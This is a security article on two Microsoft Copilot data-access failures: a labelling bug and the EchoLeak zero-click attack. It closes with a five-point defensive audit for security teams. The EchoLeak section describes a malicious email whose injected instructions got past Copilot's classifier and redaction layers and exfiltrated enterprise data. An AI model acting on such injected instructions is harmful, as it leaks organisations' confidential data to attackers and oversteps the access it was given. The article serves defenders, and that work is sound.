Microsoft Copilot ignored sensitivity labels twice in eight months — and no DLP stack caught either one

For four weeks starting January 21, Microsoft's Copilot read and summarized confidential emails despite every sensitivity label and DLP policy telling it not to. The enforcement points broke inside Microsoft’s own pipeline, and no security tool in the stack flagged it. Among the affected organizations was the U.K.'s National Health Service, which logged it as INC46740412 — a signal of how far the failure reached into regulated healthcare environments. Microsoft tracked it as CW1226324.

The advisory, first reported by BleepingComputer on February 18, marks the second time in eight months that Copilot’s retrieval pipeline violated its own trust boundary — a failure in which an AI system accesses or transmits data it was explicitly restricted from touching. The first was worse.

In June 2025, Microsoft patched CVE-2025-32711, a critical zero-click vulnerability that Aim Security researchers dubbed “EchoLeak.” One malicious email bypassed Copilot’s prompt injection classifier, its link redaction, its Content-Security-Policy, and its reference mentions to silently exfiltrate enterprise data. No clicks and no user action were required. Microsoft assigned it a CVSS score of 9.3.

Two different root causes; one blind spot: A code error and a sophisticated exploit chain produced an identical outcome. Copilot processed data it was explicitly restricted from touching, and the security stack saw nothing.

Why EDR and WAF continue to be architecturally blind to this

Endpoint detection and response (EDR) monitors file and process behavior. Web application firewalls (WAFs) inspect HTTP payloads. Neither has a detection category for “your AI assistant just violated its own trust boundary.” That gap exists because LLM retrieval pipelines sit behind an enforcement layer that traditional security tools were never designed to observe.

Copilot ingested a labeled email it was told to skip, and the entire action happened inside Microsoft's infrastructure. Between the retrieval index and the generation model. Nothing dropped to disk, no anomalous traffic crossed the perimeter, and no process spawned for an endpoint agent to flag. The security stack reported all-clear because it never saw the layer where the violation occurred.

The CW1226324 bug worked because a code-path error allowed messages in Sent Items and Drafts to enter Copilot’s retrieval set despite sensitivity labels and DLP rules that should have blocked them, according to Microsoft’s advisory. EchoLeak worked because Aim Security’s researchers proved that a malicious email, phrased to look like ordinary business correspondence, could manipulate Copilot’s retrieval-augmented generation pipeline into accessing and transmitting internal data to an attacker-controlled server.

Aim Security's researchers characterized it as a fundamental design flaw: agents process trusted and untrusted data in the same thought process, making them structurally vulnerable to manipulation. That design flaw did not disappear when Microsoft patched EchoLeak. CW1226324 proves the enforcement layer around it can fail independently.

The five-point audit that maps to both failure modes

Neither failure triggered a single alert. Both were discovered through vendor advisory channels — not through SIEM, not through EDR, not through WAF.

CW1226324 went public on February 18. Affected tenants had been exposed since January 21. Microsoft has not disclosed how many organizations were affected or what data was accessed during that window. For security leaders, that gap is the story: a four-week exposure inside a vendor's inference pipeline, invisible to every tool in the stack, discovered only because Microsoft chose to publish an advisory.

1. Test DLP enforcement against Copilot directly. CW1226324 existed for four weeks because no one tested whether Copilot actually honored sensitivity labels on Sent Items and Drafts. Create labeled test messages in controlled folders, query Copilot and confirm it cannot surface them. Run this test monthly. Configuration is not enforcement; the only proof is a failed retrieval attempt.

2. Block external content from reaching Copilot’s context window. EchoLeak succeeded because a malicious email entered Copilot’s retrieval set and its injected instructions executed as if they were the user’s query. The attack bypassed four distinct defense layers: Microsoft’s cross-prompt injection classifier, external link redaction, Content-Security-Policy controls, and reference mention safeguards, according to Aim Security’s disclosure. Disable external email context in Copilot settings, and restrict Markdown rendering in AI outputs. This catches the prompt-injection class of failure by removing the attack surface entirely.

3. Audit Purview logs for anomalous Copilot interactions during the January through February exposure window. Look for Copilot Chat queries that returned content from labeled messages between January 21 and mid-February 2026. Neither failure class produced alerts through existing EDR or WAF, so retrospective detection depends on Purview telemetry. If your tenant cannot reconstruct what Copilot accessed during the exposure window, document that gap formally. It matters for compliance. For any organization subject to regulatory examination, an undocumented AI data access gap during a known vulnerability window is an audit finding waiting to happen.

4. Turn on Restricted Content Discovery for SharePoint sites with sensitive data. RCD removes sites from Copilot’s retrieval pipeline entirely. It works regardless of whether the trust violation comes from a code bug or an injected prompt, because the data never enters the context window in the first place. This is the containment layer that does not depend on the enforcement point that broke. For organizations handling sensitive or regulated data, RCD is not optional.

5. Build an incident response playbook for vendor-hosted inference failures. Incident response (IR) playbooks need a new category: trust boundary violations inside the vendor’s inference pipeline. Define escalation paths. Assign ownership. Establish a monitoring cadence for vendor service health advisories that affect AI processing. Your SIEM will not catch the next one, either.

The pattern that transfers beyond Copilot

A 2026 survey by Cybersecurity Insiders found that 47% of CISOs and senior security leaders have already observed AI agents exhibit unintended or unauthorized behavior. Organizations are deploying AI assistants into production faster than they can build governance around them.

That trajectory matters because this framework is not Copilot-specific. Any RAG-based assistant pulling from enterprise data runs through the same pattern: a retrieval layer selects content, an enforcement layer gates what the model can see, and a generation layer produces output. If the enforcement layer fails, the retrieval layer feeds restricted data to the model, and the security stack never sees it. Copilot, Gemini for Workspace, and any tool with retrieval access to internal documents carries the same structural risk.

Run the five-point audit before your next board meeting. Start with labeled test messages in a controlled folder. If Copilot surfaces them, every policy underneath is theater.

The board answer: “Our policies were configured correctly. Enforcement failed inside the vendor’s inference pipeline. Here are the five controls we are testing, restricting, and demanding before we re-enable full access for sensitive workloads.”

The next failure will not send an alert.

Source link